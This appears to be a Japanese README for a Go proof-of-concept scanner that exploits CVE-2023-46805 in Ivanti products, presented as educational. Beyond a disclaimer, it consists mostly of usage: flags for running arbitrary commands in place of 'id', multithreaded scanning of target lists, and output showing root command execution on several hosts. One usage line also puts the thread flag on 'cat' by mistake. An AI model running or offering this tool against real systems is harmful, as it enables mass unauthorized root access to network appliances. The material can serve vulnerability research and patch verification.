
CVE-2023-46805 Ivanti POC RCE - 超高速スキャナー。
タイトル: CVE-2023-46805 の概念実証 - 教育目的のみ
ライセンス: この作品は Creative Commons Attribution 4.0 International License (CC BY 4.0) の下に提供されています。著作者が適切に表示されることを条件に、この作品を共有、複製、配布、送信、または他の目的に改変・使用することができます。
免責事項: この概念実証(PoC)は教育およびサイバーセキュリティ研究目的のみで提供されています。著作者、関連組織、または本コンテンツの作成、制作、配信に関与するその他の当事者は、本コンテンツの使用または使用不能に起因する直接的、間接的、偶発的、特別、結果的、懲罰的損害を含むいかなる損害についても責任を負いません。
教育目的: このPoCは、CVE-2023-46805として識別された脆弱性を理解し緩和するためにサイバーセキュリティコミュニティを支援することを目的としています。本番環境や悪意のある活動には使用しないでください。
脆弱性説明: Ivanti RCE
PoC詳細:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'